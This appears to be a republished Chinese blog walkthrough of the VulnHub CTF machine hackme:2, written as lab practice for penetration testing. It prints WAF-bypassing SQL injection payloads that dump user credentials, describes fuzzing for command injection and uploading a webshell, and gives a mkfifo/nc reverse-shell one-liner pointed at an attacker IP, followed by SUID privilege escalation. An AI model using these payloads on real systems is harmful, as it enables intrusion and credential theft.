漏洞payload 靶机_hackme:2 靶机攻略

最新推荐文章于 2023-06-04 14:24:31 发布
最新推荐文章于 2023-06-04 14:24:31 发布
阅读量1k 收藏 2
点赞数 2
文章标签: 漏洞payload 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42354108/article/details/113002113
版权

原标题:hackme:2 靶机攻略

00ca49dfa666e49971e5f1919c4bc2ca.png

0x01 背景:

hackme:2是vulnhub上的一个medium难度的CTF靶机,难度适中、内容丰富,贴近实战。而且没有太多的脑洞,适合安全工作者们用来练习渗透测试,然而唯一的缺憾是目前没有公开的攻略,因此把个人的通关过程记录于此,作为攻略分享给大家!

0x02 技术关键词:

SQL注入、WAF Bypass、模糊测试、文件上传、suid提权

0x03 靶机发现与端口扫描

做vulnhub上的靶机的第一步,所有的靶机都是一样的套路,不在这里多费笔墨。

d0ff0164dcec10f045da5f1d0c96d7ae.png

dbde7a79da8041d23391b2226a61d2f8.png

0x04 SQL注入与WAF Bypass

打开位于80端口的Web页面,注册一个测试账号wangtua/wangtua,就可以登录系统了,可以发现是一个书店系统。

16264ff0494fe5202cfa05c384dacad3.png

进入系统之后发现有一个搜索框,SQL注入的套路很明显了。要做SQL注入、第一步就是猜测SQL语句的格式和注入点。

1、探测SQL格式,WAF规则

本搜索框的功能是检索数据库中的书名、当搜索框为空的时候,可以返回所有的内容,

1201bdb4d2c59fc1d4d011da81535a9c.png

当搜索框中只包含书名的前一部分的时候,也可以返回对应的内容:

6a6bfde97e5731fd39665feb5a792da7.png

因此我们猜测SQL语句格式为(%代表通配符,可以匹配零个或者多个任意字符):

$sql = " SELECT* FROMBOOKS WHEREbook_name LIKE'".$input."%';"

基于此,我们构造如下payload:

Linux%' and '123 ' like '1

33129c0df1f5d08adbe27d4e9263430d.png

使用另一个payload:

Linux%' and '23 ' like '1

发现无法返回结果

4c460d25e20f1fadb142ddc918ddd6c3.png

可以验证我们的想法。

然而我们使用数据库函数的时候却出现了问题:

Payload:

Linux%'/**/and database like/**/'

没有返回内容,而当我们使用注释符来代替空格的时候,则可以执行成功。

61671c4d2801a902eb8ace936b480cd3.png

2、构造Payload

通过构造联合查询,一步一步获取出数据库名,表名,列名和字段

Linux%' /**/union /**/select/**/database/**/, '2', '3

cce62ffe560c2b1ad9be832e0e6c6a3d.png

Linux%' /**/union /**/select/**/group_concat(table_name), "2", "3"/**/from/**/information_schema.tables /**/where/**/table_schema /**/like/**/'webapp

eca55744b1c9929fb6bacfe76d8f92d7.png

Linux%' /**/union /**/select/**/group_concat(column_name), "2", "3"/**/from/**/information_schema.columns /**/where/**/table_name /**/like/**/'users'and/**/table_schema /**/like'webapp

44fa574c51a2538a48bc86fb3fdc8105.png

Linux%' /**/union /**/select/**/group_concat( user), '2', group_concat(pasword) /**/from/**/users/**/where/**/'1'/**/like/**/'

380136e968c5cfca95c0942c115c885c.png

到此为止我们发现了一个superadmin的账号,将md5值在线解码之后发现是Uncrackable

0x05 模糊测试与命令执行

进入超级管理员账号之后,我们发现了一个可以进行文件上传的点,

5745b27a37488375e935a00802dae9c3.png

上传cat.jpg之后,页面上回显了上传路径。

然而我们却无法直接访问任何文件。

接下来我们注意到下面两个输入框,可以将处理结果回显到页面上,这里我除了想到XSS之外。还想到了测试命令注入或者模板注入。可以发现在Last Name输入框里输入7*7,可以返回49

我们可以使用BurpSuite专业版的Intruder模块来进行模糊测试。

138bc13cd95aac7bc9b7d4d7087946b5.png

Payload选择模糊测试-完整,

ae89b3d7470ee33e1206fe596e50155f.png

点击开始攻击。

攻击完成之后可以发现 `id` 这个payload有命令执行的回显。

34dd8a8a5df44de98e8912b44f1d722a.png

我们换其他命令来执行,例如pwd,ls都可以正确执行而cat命令无法执行,猜测其过滤了空格,我们使用cat

可以看到在返回包里泄露的welcomeadmin.php的完整源代码,包括文件上传的绝对路径。

8f0c6778b42d2c9999816e649dfe2512.png

以及命令执行的成因:

a404516c97fa4729394253bab7af9723.png

使用哥斯拉生成木马并上传,发现php后缀被过滤,换成php3等也不行。

f2186bc75ee0bc5231a9a5ad16653aef.png

dafb062f198a91520a44e873c7045c46.png

后缀改成png之后才上传成功,然而无法正常解析成PHP文件。

e4eaf09c1286dff8cd22f605f6dc5127.png

这里考虑使用刚才的命令执行漏洞,将文件名改成god.php

ecf431c8d59629595c7b42af878837b9.png

使用哥斯拉进行连接,发现连接成功

720619632b305600b026343712feba91.png

0x06 后渗透与提权

为了可以有更好的交互环境,我们用kali自带的weevely生成木马并连接,完成连接之后使用nc反弹shell:

由于靶机的nc版本特殊,无法使用nc -e选项,因此这里使用了如下的payload

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.48.129 2333 >/tmp/f

(来自参考资料2)

b66837ccf9b0a5aa489647897de02f59.png

使用pyhton伪终端命令,可以在伪终端执行sudo等命令

使用命令find / -perm -u=s -type f 2>/dev/null来发现设置了suid位的应用程序(参考资料1)

关于suid提权的原理,可以参考P师傅的博客(参考资料3)。

发现home目录下有一个可疑的文件,执行一下之后发现顺利get root权限。

2fbca39d8e4a244db603a8b9cf8ad907.png

f2b1fd345284f311f0de7b8f93b4592d.png

0x07 总结与复盘:

这台靶机感觉制作的比较用心,SQL注入和文件上传等部分都比较贴近实战,唯一美中不足的是提权部分有些太过简单。目前本人正在备考OSCP,在vulnhub和HTB上做了不少靶机,打算最近把vulnhub上后渗透的套路总结一下,再发一篇文章,希望大家支持一下。

0x08 参考资料:

1)https://payatu.com/guide-linux-privilege-escalation

2)https://github.com/swisskyrepo/PayloadsAllTheThings

3)https://www.leavesongs.com/PENETRATION/linux-suid-privilege-escalation.html返回搜狐,查看更多

责任编辑:

AyeNay Rats
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Hackme:Hackme is a network security answer platform,Hackme网络安全答题平台
04-27
Hackme Hackme is a network security answer platform,Hackme网络安全答题平台 sec 为第一个版本,大家多多支持。 由于之前写的时候是用于网络安全知识普及性质的线下赛,所以有些内容不适合线上CTF,需要一些修改。 以后有时间再改啦,相信你们自己能改也能写,哈哈。 1、使用前先配置好OT数据库。 配置文件的位置为Application\Common\Conf\config.php /* 默认数据库配置为如下所示,按实际情况修改 */ 'DB_TYPE' => 'mysql', // 数据库类型 'DB_HOST' => '127.0.0.1', // 服务器地址 'DB_NAME' => 'ot', // 数据库名 'DB_USER' => 'root', // 用户名 'DB_PWD' => 'root', /
command-injection-payload-list::direct_hit:命令注入有效负载列表
02-03
command-injection-payload-list::direct_hit:命令注入有效负载列表
sedemo_hackme
03-29
sedemo_hackme sedemo_hackme
BLE_HackMe:低功耗蓝牙低硬件HackMe
03-13
低功耗蓝牙低硬件HackMe 该项目旨在介绍BLE协议及其安全性基础。 具有蓝牙接口的标准Windows 10计算机将模拟各种BLE设备-在无线电层上的工作原理与真实设备完全相同。 在一系列复杂性越来越高的任务中,允许您熟悉BLE广告,信标,连接,控制会说话的BLE智能灯泡,对通信进行反向工程,暴力密码,甚至破解真正的智能锁。 系统要求 Windows 10周年纪念版 蓝牙适配器-应该可以与大多数标准笔记本电脑内置的适配器一起使用,而不必与外部加密狗一起使用 这些任务被设计为使用免费的Android移动应用程序解决,并通过BLE连接到模拟设备(iOS具有有限的低级BLE功能)。 也可以使用其他BLE工具,例如在Linux或Mac上运行,但是HackMe指令中未涵盖详细信息。 安装 二进制版本在Microsoft Store中可用: 从源头建造 在Visual Studio中构建 要从源
hackme.inndy.tw的rop2题目
10-15
这是https://hackme.inndy.tw/scoreboard/的rop2题目如果网站被墙或者关闭请从这里下载
HACKME: 2实战演练
龙狼刺的博客
04-27 112
靶机网站:https://www.vulnhub.com/entry/hackme-2,618/
Hackme2靶机总结
qq_45301512的博客
12-17 341
(2) 先用最普通的测post的跑一下,发现不行,根据最后的提示,可以加上 –level 参数 和 –tramper=space2comment 参数。看了网上的答案,发现/home/legacy下存在一个touchmenot可执行文件,运行就能提权。使用msfvenom生成一个php的tiquan.php,上传到/var/www/html目录下。=eval 代替
靶机渗透练习14-hackme2
hirak0的博客
04-15 994
靶机描述 靶机地址:https://www.vulnhub.com/entry/hackme-2,618/ Description ‘hackme2’ is a medium difficulty level box. This is the second part of the hackme series where more controls are in place do deter malicious attacks. In addition, you will have to think ou
靶机渗透 HACKME-2 (详细渗透,适合新手渗透)
君莫hacker的博客
09-06 3484
靶机HACKME:2的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘三、 漏洞利用四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-2,618/ 作者 x4bx54 发布日期 2020年12月6日 难度 中等 靶机基本介绍: hackme2”是一个中等难度的关卡。这是hackme系列的第二部分,其中有更多的控件用于阻止恶意攻击。此外,你还必须跳出框框来利
Hackme靶机-渗透学习
weixin_47695901的博客
06-04 83
Hackme靶机-渗透学习 识别所存在的用户 cat /etc/passwd | grep /bin/bash 提权
Trojan源码,可进行键盘记录,屏幕抓取,远程靶机上线提示,文件上传
08-10
Trojan源码,可进行键盘记录,屏幕抓取,远程靶机上线提示,文件上传
payload_dumper_tool_by_ius_payload_dumper_payload_dumper.py_andr
10-01
payload dumper extract boot.img and others
os2子系统的hackme
06-16
一个os2子系统的hackme <br>
Payload_Launcher:使用大气层重新启动到有效载荷系统以发射有效载荷
05-15
Payload_Launcher 使用重新引导到有效负载系统来启动有效负载。 在大气中工作。 应该也适用于sx和reinx。 如何安装 将.nro文件拖放到switch文件夹中 在SD卡的根目录上创建一个名为payloads的文件夹,并将您的payload.bin文件放在该文件夹中 学分 使用来自一部分大气层代码。 大气仓库的许可证包含在AMS_LICENCE中。 不和谐 是的,我有不和谐之处,您可以
Payload_Dumber_x64.zip
07-04
一加刷机包payload.bin解包工具
SQL_Injection_Payload:SQL注入有效负载列表
01-28
SQL_Injection_Payload:SQL注入有效负载列表
MSFVENOM_windows_payload_creator_V1.0:V1.0
05-03
MSFVENOM_windows_payload_creator_V1.0 V1.0 MSFVENOM Windows Payload Builder是一个简单的perl脚本,旨在简化创建可自定义的Windows可执行文件的任务。 该脚本使用Shikata_na_gai mfsvenon模块创建有效负载可执行...
靶机渗透 hackme-1(详解,适合新手)
君莫hacker的博客
09-05 5883
靶机hackme-1的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘SQL注入文件上传漏洞三、 漏洞利用反弹shell方法一:一句话木马,蚁剑连接反弹shell方法二:system命令执行四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布时间 18 Jul 2019 作者 x4bx54 难度 简单 靶机基本介绍: “hackme”是一个
hackme-1初级渗透测试
jrdh的博客
11-26 1552
Hackme-1环境搭建1. 详情2. 描述一:信息收集0x01主机发现端口扫描服务扫描服务器指纹信息查询网站目录爆破二:漏洞发现创建用户SQL注入MD5解密文件上传漏洞漏洞验证三:漏洞利用反弹shell法一: 一句话木马四:提权 环境搭建 测试机:kali:192.168.10.153 靶机hackme-1:192.168.10.155 1. 详情 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布日期 2019年7月18日 作者 x4bx54 难度 初
if need_logs: print("Decode DNA to bits.") bit_segments = np.zeros((len(dna_sequences), payload), dtype=np.uint8) dubious = collections.defaultdict(list) monitor = Monitor() for i, sequence in enumerate(dna_sequences): dna_sequence = sequence[:-vt_length] if vt_length > 0 else sequence vt_check = sequence[-vt_length:] if vt_length > 0 else None try: result = dsw.decode(dna_sequence, index_binary_length + payload, coding_accessor, start_index, is_faster=True if 3 not in out_degree_counter and 4 not in out_degree_counter else False, vt_check=vt_check) index_bits, payload_bits = result[:index_binary_length], result[index_binary_length:] index = int(''.join(str(bit) for bit in index_bits), 2) bit_segments[index] = payload_bits except ValueError: # decode失败,尝试修复 candidates = self.repair_dna(dna_sequence, coding_accessor, start_index, vt_check) if len(candidates) == 0: raise ValueError("Candidates len should never be zero!") for candidate in candidates: result = dsw.decode(candidate, index_binary_length + payload, coding_accessor, start_index, is_faster=True if 3 not in out_degree_counter and 4 not in out_degree_counter else False, vt_check=None) index_bits, payload_bits = result[:index_binary_length], result[index_binary_length:] index = int(''.join(str(bit) for bit in index_bits), 2) if len(candidates) == 1: bit_segments[index] = payload_bits else: dubious[index].append(payload_bits) if need_logs: monitor(i + 1, len(dna_sequences))
最新发布
07-16
然后,创建一个大小为`(len(dna_sequences), payload)`的全零数组`bit_segments`,用于存储解码后的位段。 接着,创建了一个默认值为列表的字典`dubious`,用于存储解码失败的位段备选方案。 然后,创建一个监视器...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值